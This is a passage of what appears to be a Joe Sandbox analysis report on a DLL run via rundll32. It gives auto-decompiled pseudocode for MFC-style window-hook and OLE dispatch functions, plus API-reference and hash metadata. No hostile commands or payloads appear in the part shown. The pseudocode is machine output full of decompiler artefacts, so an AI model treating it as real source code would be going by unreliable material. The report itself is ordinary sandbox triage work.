                                                                                                                    			E1001C915(void* __ebx, intOrPtr __edi, void* __esi, void* __eflags) {
                                                                                                                    				intOrPtr _t54;
                                                                                                                    				void* _t55;
                                                                                                                    				signed int _t56;
                                                                                                                    				void* _t59;
                                                                                                                    				long _t60;
                                                                                                                    				signed int _t64;
                                                                                                                    				void* _t66;
                                                                                                                    				short _t72;
                                                                                                                    				signed int _t74;
                                                                                                                    				signed int _t76;
                                                                                                                    				long _t83;
                                                                                                                    				signed int _t86;
                                                                                                                    				signed short _t87;
                                                                                                                    				signed int _t88;
                                                                                                                    				int _t94;
                                                                                                                    				void* _t107;
                                                                                                                    				long* _t109;
                                                                                                                    				long _t111;
                                                                                                                    				signed int _t112;
                                                                                                                    				CHAR* _t113;
                                                                                                                    				intOrPtr _t114;
                                                                                                                    				void* _t117;
                                                                                                                    				void* _t120;
                                                                                                                    				intOrPtr _t121;
                                                                                                                    
                                                                                                                    				_t120 = __eflags;
                                                                                                                    				_t106 = __edi;
                                                                                                                    				_push(0x148);
                                                                                                                    				E10030D90(E1004429C, __ebx, __edi, __esi);
                                                                                                                    				_t111 =  *(_t117 + 0x10);
                                                                                                                    				_t94 =  *(_t117 + 0xc);
                                                                                                                    				_push(E10015B30);
                                                                                                                    				 *(_t117 - 0x120) = _t111;
                                                                                                                    				_t54 = E10020C26(_t94, 0x100575a4, __edi, _t111, _t120);
                                                                                                                    				_t121 = _t54;
                                                                                                                    				_t97 = 0 | _t121 == 0x00000000;
                                                                                                                    				 *((intOrPtr*)(_t117 - 0x11c)) = _t54;
                                                                                                                    				if(_t121 == 0) {
                                                                                                                    					_t54 = E100201F1(_t97);
                                                                                                                    				}
                                                                                                                    				if( *(_t117 + 8) == 3) {
                                                                                                                    					_t107 =  *_t111;
                                                                                                                    					_t112 =  *(_t54 + 0x14);
                                                                                                                    					_t55 = E1001F9FC(_t94, _t107, _t112, __eflags);
                                                                                                                    					__eflags = _t112;
                                                                                                                    					_t56 =  *(_t55 + 0x14) & 0x000000ff;
                                                                                                                    					 *(_t117 - 0x124) = _t56;
                                                                                                                    					if(_t112 != 0) {
                                                                                                                    						L7:
                                                                                                                    						__eflags =  *0x10057854;
                                                                                                                    						if( *0x10057854 == 0) {
                                                                                                                    							L12:
                                                                                                                    							__eflags = _t112;
                                                                                                                    							if(__eflags == 0) {
                                                                                                                    								__eflags =  *0x10057454;
                                                                                                                    								if( *0x10057454 != 0) {
                                                                                                                    									L19:
                                                                                                                    									__eflags = (GetClassLongA(_t94, 0xffffffe0) & 0x0000ffff) -  *0x10057454; // 0x0
                                                                                                                    									if(__eflags != 0) {
                                                                                                                    										L23:
                                                                                                                    										_t59 = GetWindowLongA(_t94, 0xfffffffc);
                                                                                                                    										__eflags = _t59;
                                                                                                                    										 *(_t117 - 0x14) = _t59;
                                                                                                                    										if(_t59 != 0) {
                                                                                                                    											_t113 = "AfxOldWndProc423";
                                                                                                                    											_t64 = GetPropA(_t94, _t113);
                                                                                                                    											__eflags = _t64;
                                                                                                                    											if(_t64 == 0) {
                                                                                                                    												SetPropA(_t94, _t113,  *(_t117 - 0x14));
                                                                                                                    												_t66 = GetPropA(_t94, _t113);
                                                                                                                    												__eflags = _t66 -  *(_t117 - 0x14);
                                                                                                                    												if(_t66 ==  *(_t117 - 0x14)) {
                                                                                                                    													GlobalAddAtomA(_t113);
                                                                                                                    													SetWindowLongA(_t94, 0xfffffffc, E1001C7D1);
                                                                                                                    												}
                                                                                                                    											}
                                                                                                                    										}
                                                                                                                    										L27:
                                                                                                                    										_t106 =  *((intOrPtr*)(_t117 - 0x11c));
                                                                                                                    										_t60 = CallNextHookEx( *(_t106 + 0x28), 3, _t94,  *(_t117 - 0x120));
                                                                                                                    										__eflags =  *(_t117 - 0x124);
                                                                                                                    										_t111 = _t60;
                                                                                                                    										if( *(_t117 - 0x124) != 0) {
                                                                                                                    											UnhookWindowsHookEx( *(_t106 + 0x28));
                                                                                                                    											_t50 = _t106 + 0x28;
                                                                                                                    											 *_t50 =  *(_t106 + 0x28) & 0x00000000;
                                                                                                                    											__eflags =  *_t50;
                                                                                                                    										}
                                                                                                                    										goto L30;
                                                                                                                    									}
                                                                                                                    									goto L27;
                                                                                                                    								}
                                                                                                                    								_t114 = 0x30;
                                                                                                                    								E10030030(_t107, _t117 - 0x154, 0, _t114);
                                                                                                                    								 *((intOrPtr*)(_t117 - 0x154)) = _t114;
                                                                                                                    								_push(_t117 - 0x154);
                                                                                                                    								_push("#32768");
                                                                                                                    								_push(0);
                                                                                                                    								_t72 = E10019B2E(_t94, _t107, "#32768", __eflags);
                                                                                                                    								__eflags = _t72;
                                                                                                                    								 *0x10057454 = _t72;
                                                                                                                    								if(_t72 == 0) {
                                                                                                                    									_t74 = GetClassNameA(_t94, _t117 - 0x118, 0x100);
                                                                                                                    									__eflags = _t74;
                                                                                                                    									if(_t74 == 0) {
                                                                                                                    										goto L23;
                                                                                                                    									}
                                                                                                                    									 *((char*)(_t117 - 0x19)) = 0;
                                                                                                                    									_t76 = E10032D2F(_t117 - 0x118, "#32768");
                                                                                                                    									__eflags = _t76;
                                                                                                                    									if(_t76 == 0) {
                                                                                                                    										goto L27;
                                                                                                                    									}
                                                                                                                    									goto L23;
                                                                                                                    								}
                                                                                                                    								goto L19;
                                                                                                                    							}
                                                                                                                    							E1001FA48(_t117 - 0x18, __eflags,  *((intOrPtr*)(_t112 + 0x1c)));
                                                                                                                    							 *(_t117 - 4) =  *(_t117 - 4) & 0x00000000;
                                                                                                                    							E1001B083(_t112, _t117, _t94);
                                                                                                                    							 *((intOrPtr*)( *_t112 + 0x50))();
                                                                                                                    							_t109 =  *((intOrPtr*)( *_t112 + 0xf0))();
                                                                                                                    							_t83 = SetWindowLongA(_t94, 0xfffffffc, E1001B780);
                                                                                                                    							__eflags = _t83 - E1001B780;
                                                                                                                    							if(_t83 != E1001B780) {
                                                                                                                    								 *_t109 = _t83;
                                                                                                                    							}
                                                                                                                    							 *( *((intOrPtr*)(_t117 - 0x11c)) + 0x14) =  *( *((intOrPtr*)(_t117 - 0x11c)) + 0x14) & 0x00000000;
                                                                                                                    							 *(_t117 - 4) =  *(_t117 - 4) | 0xffffffff;
                                                                                                                    							__eflags =  *(_t117 - 0x14);
                                                                                                                    							if( *(_t117 - 0x14) != 0) {
                                                                                                                    								_push( *(_t117 - 0x18));
                                                                                                                    								_push(0);
                                                                                                                    								E1001F30C();
                                                                                                                    							}
                                                                                                                    							goto L27;
                                                                                                                    						}
                                                                                                                    						_t86 = GetClassLongA(_t94, 0xffffffe6);
                                                                                                                    						__eflags = _t86 & 0x00010000;
                                                                                                                    						if((_t86 & 0x00010000) != 0) {
                                                                                                                    							goto L27;
                                                                                                                    						}
                                                                                                                    						_t87 =  *(_t107 + 0x28);
                                                                                                                    						__eflags = _t87 - 0xffff;
                                                                                                                    						if(_t87 <= 0xffff) {
                                                                                                                    							 *(_t117 - 0x18) = 0;
                                                                                                                    							GlobalGetAtomNameA( *(_t107 + 0x28) & 0x0000ffff, _t117 - 0x18, 5);
                                                                                                                    							_t87 = _t117 - 0x18;
                                                                                                                    						}
                                                                                                                    						_t88 = E10014B55(_t87, "ime");
                                                                                                                    						__eflags = _t88;
                                                                                                                    						if(_t88 == 0) {
                                                                                                                    							goto L27;
                                                                                                                    						}
                                                                                                                    						goto L12;
                                                                                                                    					}
                                                                                                                    					__eflags =  *(_t107 + 0x20) & 0x40000000;
                                                                                                                    					if(( *(_t107 + 0x20) & 0x40000000) != 0) {
                                                                                                                    						goto L27;
                                                                                                                    					}
                                                                                                                    					__eflags = _t56;
                                                                                                                    					if(_t56 != 0) {
                                                                                                                    						goto L27;
                                                                                                                    					}
                                                                                                                    					goto L7;
                                                                                                                    				} else {
                                                                                                                    					CallNextHookEx( *(_t54 + 0x28),  *(_t117 + 8), _t94, _t111);
                                                                                                                    					L30:
                                                                                                                    					return E10030E13(_t94, _t106, _t111);
                                                                                                                    				}
                                                                                                                    			}



























                                                                                                                    0x1001ca26
                                                                                                                    0x1001ca2c
                                                                                                                    0x1001ca2e
                                                                                                                    0x1001ca30
                                                                                                                    0x1001ca30
                                                                                                                    0x1001ca38
                                                                                                                    0x1001ca3c
                                                                                                                    0x1001ca40
                                                                                                                    0x1001ca44
                                                                                                                    0x1001ca4a
                                                                                                                    0x1001ca4d
                                                                                                                    0x1001ca4f
                                                                                                                    0x1001ca4f
                                                                                                                    0x00000000
                                                                                                                    0x1001ca44
                                                                                                                    0x1001c9a7
                                                                                                                    0x1001c9ad
                                                                                                                    0x1001c9b2
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1001c9b8
                                                                                                                    0x1001c9bb
                                                                                                                    0x1001c9c0
                                                                                                                    0x1001c9cd
                                                                                                                    0x1001c9d1
                                                                                                                    0x1001c9d7
                                                                                                                    0x1001c9d7
                                                                                                                    0x1001c9e0
                                                                                                                    0x1001c9e5
                                                                                                                    0x1001c9e9
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1001c9e9
                                                                                                                    0x1001c986
                                                                                                                    0x1001c98d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1001c993
                                                                                                                    0x1001c995
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1001c95b
                                                                                                                    0x1001c963
                                                                                                                    0x1001cb60
                                                                                                                    0x1001cb65
                                                                                                                    0x1001cb65

                                                                                                                    APIs
                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 1001C91F
                                                                                                                      • Part of subcall function 10020C26: __EH_prolog3.LIBCMT ref: 10020C2D
                                                                                                                    • CallNextHookEx.USER32 ref: 1001C963
                                                                                                                      • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                    • GetClassLongA.USER32(?,000000E6), ref: 1001C9A7
                                                                                                                    • GlobalGetAtomNameA.KERNEL32 ref: 1001C9D1
                                                                                                                    • SetWindowLongA.USER32 ref: 1001CA26
                                                                                                                    • _memset.LIBCMT ref: 1001CA70
                                                                                                                    • GetClassLongA.USER32(?,000000E0), ref: 1001CAA0
                                                                                                                    • GetClassNameA.USER32(?,?,00000100), ref: 1001CAC1
                                                                                                                    • GetWindowLongA.USER32(?,000000FC), ref: 1001CAE5
                                                                                                                    • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001CAFF
                                                                                                                    • SetPropA.USER32(?,AfxOldWndProc423,?), ref: 1001CB0A
                                                                                                                    • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001CB12
                                                                                                                    • GlobalAddAtomA.KERNEL32(AfxOldWndProc423), ref: 1001CB1A
                                                                                                                    • SetWindowLongA.USER32 ref: 1001CB28
                                                                                                                    • CallNextHookEx.USER32 ref: 1001CB40
                                                                                                                    • UnhookWindowsHookEx.USER32 ref: 1001CB54
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Long$ClassHookPropWindow$AtomCallGlobalNameNext$Exception@8H_prolog3H_prolog3_ThrowUnhookWindows_memset
                                                                                                                    • String ID: #32768$AfxOldWndProc423$ime
                                                                                                                    • API String ID: 867647115-4034971020
                                                                                                                    • Opcode ID: be0f4bdd952448ef7690da40483777f37b87bc3c1912211ef9ad5859523c10f5
                                                                                                                    • Instruction ID: e0f5ce7512a5b4d1e32b812d2adba45b1a1350b75cf904612dadc9a2b629d5df
                                                                                                                    • Opcode Fuzzy Hash: be0f4bdd952448ef7690da40483777f37b87bc3c1912211ef9ad5859523c10f5
                                                                                                                    • Instruction Fuzzy Hash: A561EF7540426EAFDB11DF61CD89FAE3BB8EF09362F100154F509EA191DB34EA80CBA5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 46%
                                                                                                                    			E1002DB49(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                    				void* _t190;
                                                                                                                    				signed int _t194;
                                                                                                                    				intOrPtr* _t200;
                                                                                                                    				signed int _t203;
                                                                                                                    				signed int _t206;
                                                                                                                    				intOrPtr* _t208;
                                                                                                                    				intOrPtr _t211;
                                                                                                                    				char _t230;
                                                                                                                    				CHAR* _t236;
                                                                                                                    				intOrPtr _t237;
                                                                                                                    				signed short _t240;
                                                                                                                    				signed int _t241;
                                                                                                                    				signed int _t242;
                                                                                                                    				signed int _t250;
                                                                                                                    				signed int* _t257;
                                                                                                                    				signed int _t258;
                                                                                                                    				signed int _t277;
                                                                                                                    				signed short* _t278;
                                                                                                                    				signed short* _t279;
                                                                                                                    				signed int _t290;
                                                                                                                    				signed int _t291;
                                                                                                                    				intOrPtr* _t293;
                                                                                                                    				CHAR* _t295;
                                                                                                                    				intOrPtr* _t296;
                                                                                                                    				intOrPtr _t297;
                                                                                                                    				signed int** _t299;
                                                                                                                    				void* _t300;
                                                                                                                    				void* _t301;
                                                                                                                    				void* _t302;
                                                                                                                    				void* _t313;
                                                                                                                    
                                                                                                                    				_push(0x7c);
                                                                                                                    				_t190 = E10030D27(E10044FCE, __ebx, __edi, __esi);
                                                                                                                    				 *((intOrPtr*)(_t300 - 0x24)) = __ecx;
                                                                                                                    				_t257 = 0;
                                                                                                                    				if( *((intOrPtr*)(__ecx)) == 0) {
                                                                                                                    					L78:
                                                                                                                    					return E10030DFF(_t190);
                                                                                                                    				}
                                                                                                                    				 *((intOrPtr*)(_t300 - 0x54)) = 0;
                                                                                                                    				 *((intOrPtr*)(_t300 - 0x50)) = 0;
                                                                                                                    				 *(_t300 - 0x4c) = 0;
                                                                                                                    				 *((intOrPtr*)(_t300 - 0x48)) = 0;
                                                                                                                    				 *(_t300 - 4) = 0;
                                                                                                                    				E10030030(__edi, _t300 - 0x54, 0, 0x10);
                                                                                                                    				_t302 = _t301 + 0xc;
                                                                                                                    				if( *(_t300 + 0x18) != 0) {
                                                                                                                    					 *(_t300 - 0x4c) = lstrlenA( *(_t300 + 0x18));
                                                                                                                    				}
                                                                                                                    				 *((intOrPtr*)(_t300 - 0x20)) = 0xfffffffd;
                                                                                                                    				if(( *(_t300 + 0xc) & 0x0000000c) != 0) {
                                                                                                                    					 *((intOrPtr*)(_t300 - 0x48)) = 1;
                                                                                                                    					 *((intOrPtr*)(_t300 - 0x50)) = _t300 - 0x20;
                                                                                                                    				}
                                                                                                                    				 *((intOrPtr*)(_t300 - 0x68)) = 0x100492f8;
                                                                                                                    				 *((intOrPtr*)(_t300 - 0x64)) = _t257;
                                                                                                                    				 *((intOrPtr*)(_t300 - 0x58)) = _t257;
                                                                                                                    				 *((intOrPtr*)(_t300 - 0x5c)) = _t257;
                                                                                                                    				 *((intOrPtr*)(_t300 - 0x60)) = _t257;
                                                                                                                    				_t194 =  *(_t300 - 0x4c);
                                                                                                                    				_t308 = _t194 - _t257;
                                                                                                                    				 *(_t300 - 4) = 1;
                                                                                                                    				_t293 = 4;
                                                                                                                    				if(_t194 == _t257) {
                                                                                                                    					L37:
                                                                                                                    					_t295 = 0;
                                                                                                                    					E1002BDD9(_t300 - 0x44);
                                                                                                                    					if( *(_t300 + 0x10) != _t257) {
                                                                                                                    						_t295 = _t300 - 0x44;
                                                                                                                    					}
                                                                                                                    					E10030030(_t293, _t300 - 0x88, _t257, 0x20);
                                                                                                                    					_t200 =  *((intOrPtr*)( *((intOrPtr*)(_t300 - 0x24))));
                                                                                                                    					 *(_t300 - 0x28) =  *(_t300 - 0x28) | 0xffffffff;
                                                                                                                    					_t289 = _t300 - 0x54;
                                                                                                                    					 *(_t300 + 0xc) =  *((intOrPtr*)( *_t200 + 0x18))(_t200,  *((intOrPtr*)(_t300 + 8)), 0x1004b61c, _t257,  *(_t300 + 0xc), _t300 - 0x54, _t295, _t300 - 0x88, _t300 - 0x28);
                                                                                                                    					E1002DAF2(_t300 - 0x68);
                                                                                                                    					_t203 =  *(_t300 - 0x4c);
                                                                                                                    					if(_t203 == _t257) {
                                                                                                                    						L46:
                                                                                                                    						_push( *((intOrPtr*)(_t300 - 0x54)));
                                                                                                                    						E10014517(_t257, _t289, _t293, _t295, _t319);
                                                                                                                    						 *((intOrPtr*)(_t300 - 0x54)) = _t257;
                                                                                                                    						if( *(_t300 + 0xc) >= _t257) {
                                                                                                                    							L61:
                                                                                                                    							_t295 =  *(_t300 + 0x10);
                                                                                                                    							if(_t295 == _t257) {
                                                                                                                    								L76:
                                                                                                                    								 *(_t300 - 4) = 0;
                                                                                                                    								_t190 = E1002CDE9(_t300 - 0x68, _t289);
                                                                                                                    								 *(_t300 - 4) =  *(_t300 - 4) | 0xffffffff;
                                                                                                                    								__eflags =  *((intOrPtr*)(_t300 - 0x54)) - _t257;
                                                                                                                    								if(__eflags != 0) {
                                                                                                                    									_push( *((intOrPtr*)(_t300 - 0x54)));
                                                                                                                    									_t190 = E10014517(_t257, _t289, _t293, _t295, __eflags);
                                                                                                                    								}
                                                                                                                    								goto L78;
                                                                                                                    							}
                                                                                                                    							if(_t295 == 0xc) {
                                                                                                                    								L65:
                                                                                                                    								_t206 = (_t295 & 0x0000ffff) + 0xfffffffe;
                                                                                                                    								__eflags = _t206 - 0x13;
                                                                                                                    								if(_t206 > 0x13) {
                                                                                                                    									goto L76;
                                                                                                                    								}
                                                                                                                    								switch( *((intOrPtr*)(_t206 * 4 +  &M1002E0D9))) {
                                                                                                                    									case 0:
                                                                                                                    										__eax =  *(__ebp + 0x14);
                                                                                                                    										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
                                                                                                                    										goto L76;
                                                                                                                    									case 1:
                                                                                                                    										__eax =  *(__ebp + 0x14);
                                                                                                                    										__ecx =  *(__ebp - 0x3c);
                                                                                                                    										 *( *(__ebp + 0x14)) = __ecx;
                                                                                                                    										goto L76;
                                                                                                                    									case 2:
                                                                                                                    										__eax =  *(__ebp + 0x14);
                                                                                                                    										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
                                                                                                                    										goto L76;
                                                                                                                    									case 3:
                                                                                                                    										__eax =  *(__ebp + 0x14);
                                                                                                                    										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
                                                                                                                    										goto L76;
                                                                                                                    									case 4:
                                                                                                                    										__ecx =  *(__ebp - 0x3c);
                                                                                                                    										__eax =  *(__ebp + 0x14);
                                                                                                                    										 *__eax =  *(__ebp - 0x3c);
                                                                                                                    										__ecx =  *(__ebp - 0x38);
                                                                                                                    										 *(__eax + 4) = __ecx;
                                                                                                                    										goto L76;
                                                                                                                    									case 5:
                                                                                                                    										__eax = E1002BC90(__eax, __ecx,  *(__ebp + 0x14),  *(__ebp - 0x3c));
                                                                                                                    										_push( *(__ebp - 0x3c));
                                                                                                                    										__imp__#6();
                                                                                                                    										goto L76;
                                                                                                                    									case 6:
                                                                                                                    										__ecx =  *(__ebp + 0x14);
                                                                                                                    										__eax = 0;
                                                                                                                    										__eflags =  *(__ebp - 0x3c) - __bx;
                                                                                                                    										__eax = 0 | __eflags != 0x00000000;
                                                                                                                    										 *__ecx = __eflags != 0;
                                                                                                                    										goto L76;
                                                                                                                    									case 7:
                                                                                                                    										__edi =  *(__ebp + 0x14);
                                                                                                                    										__esi = __ebp - 0x44;
                                                                                                                    										asm("movsd");
                                                                                                                    										asm("movsd");
                                                                                                                    										asm("movsd");
                                                                                                                    										asm("movsd");
                                                                                                                    										__ebx = 0;
                                                                                                                    										goto L76;
                                                                                                                    									case 8:
                                                                                                                    										goto L76;
                                                                                                                    									case 9:
                                                                                                                    										 *((char*)( *((intOrPtr*)(_t300 + 0x14)))) =  *((intOrPtr*)(_t300 - 0x3c));
                                                                                                                    										goto L76;
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    							_t208 = _t300 - 0x44;
                                                                                                                    							__imp__#12(_t208, _t208, _t257, _t295);
                                                                                                                    							_t293 = _t208;
                                                                                                                    							_t321 = _t293 - _t257;
                                                                                                                    							if(_t293 >= _t257) {
                                                                                                                    								goto L65;
                                                                                                                    							}
                                                                                                                    							__imp__#9(_t300 - 0x44);
                                                                                                                    							_push(_t293);
                                                                                                                    							L49:
                                                                                                                    							E1001FCED(_t257, _t293, _t295, _t321);
                                                                                                                    							L50:
                                                                                                                    							_t322 =  *((intOrPtr*)(_t300 - 0x70)) - _t257;
                                                                                                                    							if( *((intOrPtr*)(_t300 - 0x70)) != _t257) {
                                                                                                                    								 *((intOrPtr*)(_t300 - 0x70))(_t300 - 0x88);
                                                                                                                    							}
                                                                                                                    							_t211 = E100144EC(_t322, 0x20);
                                                                                                                    							 *((intOrPtr*)(_t300 + 0x14)) = _t211;
                                                                                                                    							_t323 = _t211 - _t257;
                                                                                                                    							 *(_t300 - 4) = 4;
                                                                                                                    							if(_t211 != _t257) {
                                                                                                                    								_push( *((intOrPtr*)(_t300 - 0x88)));
                                                                                                                    								_push(_t257);
                                                                                                                    								_push(_t257);
                                                                                                                    								_t257 = E1002D549(_t257, _t211, _t293, _t295, _t323);
                                                                                                                    							}
                                                                                                                    							_push( *((intOrPtr*)(_t300 - 0x84)));
                                                                                                                    							_t293 = __imp__#7;
                                                                                                                    							 *(_t300 - 4) = 1;
                                                                                                                    							if( *_t293() != 0) {
                                                                                                                    								_t139 = _t257 + 0x18; // 0x18
                                                                                                                    								E1001FF59(_t139,  *((intOrPtr*)(_t300 - 0x84)));
                                                                                                                    							}
                                                                                                                    							_t296 = __imp__#6;
                                                                                                                    							 *_t296( *((intOrPtr*)(_t300 - 0x84)));
                                                                                                                    							_push( *((intOrPtr*)(_t300 - 0x80)));
                                                                                                                    							if( *_t293() != 0) {
                                                                                                                    								_t143 = _t257 + 0xc; // 0xc
                                                                                                                    								E1001FF59(_t143,  *((intOrPtr*)(_t300 - 0x80)));
                                                                                                                    							}
                                                                                                                    							 *_t296( *((intOrPtr*)(_t300 - 0x80)));
                                                                                                                    							_push( *((intOrPtr*)(_t300 - 0x7c)));
                                                                                                                    							if( *_t293() != 0) {
                                                                                                                    								_t147 = _t257 + 0x14; // 0x14
                                                                                                                    								E1001FF59(_t147,  *((intOrPtr*)(_t300 - 0x7c)));
                                                                                                                    							}
                                                                                                                    							 *_t296( *((intOrPtr*)(_t300 - 0x7c)));
                                                                                                                    							 *((intOrPtr*)(_t257 + 0x10)) =  *((intOrPtr*)(_t300 - 0x78));
                                                                                                                    							 *((intOrPtr*)(_t257 + 0x1c)) =  *((intOrPtr*)(_t300 - 0x6c));
                                                                                                                    							 *((intOrPtr*)(_t300 + 0x14)) = _t257;
                                                                                                                    							E10033135(_t300 + 0x14, 0x100505f8);
                                                                                                                    							goto L61;
                                                                                                                    						}
                                                                                                                    						__imp__#9(_t300 - 0x44);
                                                                                                                    						_t321 =  *(_t300 + 0xc) - 0x80020009;
                                                                                                                    						if( *(_t300 + 0xc) == 0x80020009) {
                                                                                                                    							goto L50;
                                                                                                                    						}
                                                                                                                    						_push( *(_t300 + 0xc));
                                                                                                                    						goto L49;
                                                                                                                    					} else {
                                                                                                                    						_t295 =  *(_t300 + 0x18);
                                                                                                                    						_t293 = (_t203 << 4) +  *((intOrPtr*)(_t300 - 0x54)) - 0x10;
                                                                                                                    						while(1) {
                                                                                                                    							_t319 =  *_t295;
                                                                                                                    							if( *_t295 == 0) {
                                                                                                                    								goto L46;
                                                                                                                    							}
                                                                                                                    							_t230 =  *_t295;
                                                                                                                    							__eflags = _t230 - 8;
                                                                                                                    							if(_t230 == 8) {
                                                                                                                    								L43:
                                                                                                                    								__imp__#9(_t293);
                                                                                                                    								L44:
                                                                                                                    								_t293 = _t293 - 0x10;
                                                                                                                    								_t295 =  &(_t295[1]);
                                                                                                                    								__eflags = _t295;
                                                                                                                    								continue;
                                                                                                                    							}
                                                                                                                    							__eflags = _t230 - 0xe;
                                                                                                                    							if(_t230 != 0xe) {
                                                                                                                    								goto L44;
                                                                                                                    							}
                                                                                                                    							goto L43;
                                                                                                                    						}
                                                                                                                    						goto L46;
                                                                                                                    					}
                                                                                                                    				} else {
                                                                                                                    					_t290 = 0x10;
                                                                                                                    					_t291 = _t194 * _t290 >> 0x20;
                                                                                                                    					_t297 = E100144EC(_t308,  ~(0 | _t308 > 0x00000000) | _t194 * _t290);
                                                                                                                    					 *((intOrPtr*)(_t300 - 0x54)) = _t297;
                                                                                                                    					E10030030(_t293, _t297, _t257,  *(_t300 - 0x4c) << 4);
                                                                                                                    					_t236 =  *(_t300 + 0x18);
                                                                                                                    					_t277 =  *(_t300 - 0x4c) << 4;
                                                                                                                    					_t302 = _t302 + 0x10;
                                                                                                                    					_t36 = _t277 - 0x10; // -16
                                                                                                                    					_t278 = _t297 + _t36;
                                                                                                                    					 *(_t300 - 0x14) = _t236;
                                                                                                                    					 *(_t300 - 0x10) = _t278;
                                                                                                                    					if( *_t236 == 0) {
                                                                                                                    						goto L37;
                                                                                                                    					}
                                                                                                                    					_t237 =  *((intOrPtr*)(_t300 + 0x1c));
                                                                                                                    					_t299 =  &(_t278[4]);
                                                                                                                    					_t258 = _t237 - 4;
                                                                                                                    					 *(_t300 - 0x1c) = _t299;
                                                                                                                    					 *((intOrPtr*)(_t300 + 0x1c)) = _t237 + 0xfffffff8;
                                                                                                                    					do {
                                                                                                                    						_t240 =  *( *(_t300 - 0x14)) & 0x000000ff;
                                                                                                                    						_t279 =  *(_t300 - 0x10);
                                                                                                                    						 *_t279 = _t240;
                                                                                                                    						if((_t240 & 0x00000040) != 0) {
                                                                                                                    							 *_t279 = _t240 & 0x0000ffbf | 0x00004000;
                                                                                                                    						}
                                                                                                                    						_t241 =  *_t279 & 0x0000ffff;
                                                                                                                    						_t313 = _t241 - 0x4002;
                                                                                                                    						if(_t313 > 0) {
                                                                                                                    							_t242 = _t241 - 0x4003;
                                                                                                                    							__eflags = _t242 - 0x12;
                                                                                                                    							if(__eflags > 0) {
                                                                                                                    								goto L35;
                                                                                                                    							}
                                                                                                                    							switch( *((intOrPtr*)(_t242 * 4 +  &M1002E08D))) {
                                                                                                                    								case 0:
                                                                                                                    									goto L34;
                                                                                                                    								case 1:
                                                                                                                    									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
                                                                                                                    									_t258 = _t258 + _t293;
                                                                                                                    									_t244 =  *_t258;
                                                                                                                    									asm("sbb ecx, ecx");
                                                                                                                    									 *_t244 =  ~( *_t244) & 0x0000ffff;
                                                                                                                    									 *_t299 = _t244;
                                                                                                                    									_t245 = E1002CA61(_t300 - 0x34, _t299, _t244, _t244, 0);
                                                                                                                    									 *(_t300 - 4) = 3;
                                                                                                                    									E1002CE83(_t300 - 0x68, _t291, _t300,  *((intOrPtr*)(_t300 - 0x60)), _t245);
                                                                                                                    									__eflags =  *(_t300 - 0x2c);
                                                                                                                    									 *(_t300 - 4) = 1;
                                                                                                                    									if(__eflags != 0) {
                                                                                                                    										_push( *((intOrPtr*)(_t300 - 0x34)));
                                                                                                                    										E10014517(_t258, _t291, _t293, _t299, __eflags);
                                                                                                                    									}
                                                                                                                    									goto L35;
                                                                                                                    								case 2:
                                                                                                                    									goto L35;
                                                                                                                    							}
                                                                                                                    						} else {
                                                                                                                    							if(_t313 == 0) {
                                                                                                                    								L34:
                                                                                                                    								 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
                                                                                                                    								_t258 = _t258 + _t293;
                                                                                                                    								__eflags = _t258;
                                                                                                                    								 *_t299 =  *_t258;
                                                                                                                    								goto L35;
                                                                                                                    							}
                                                                                                                    							_t250 = _t241;
                                                                                                                    							if(_t250 > 0x13) {
                                                                                                                    								goto L35;
                                                                                                                    							}
                                                                                                                    							switch( *((intOrPtr*)(_t250 * 4 +  &M1002E03D))) {
                                                                                                                    								case 0:
                                                                                                                    									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                                                                    									__ebx = __ebx + __edi;
                                                                                                                    									__ax =  *__ebx;
                                                                                                                    									goto L28;
                                                                                                                    								case 1:
                                                                                                                    									goto L34;
                                                                                                                    								case 2:
                                                                                                                    									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
                                                                                                                    									__eax =  *(__ebp + 0x1c);
                                                                                                                    									__ebx =  &(__ebx[2]);
                                                                                                                    									 *__esi =  *( *(__ebp + 0x1c));
                                                                                                                    									goto L35;
                                                                                                                    								case 3:
                                                                                                                    									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
                                                                                                                    									__eax =  *(__ebp + 0x1c);
                                                                                                                    									__ebx =  &(__ebx[2]);
                                                                                                                    									 *__esi =  *( *(__ebp + 0x1c));
                                                                                                                    									goto L35;
                                                                                                                    								case 4:
                                                                                                                    									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                                                                    									__ebx = __ebx + __edi;
                                                                                                                    									__eax =  *__ebx;
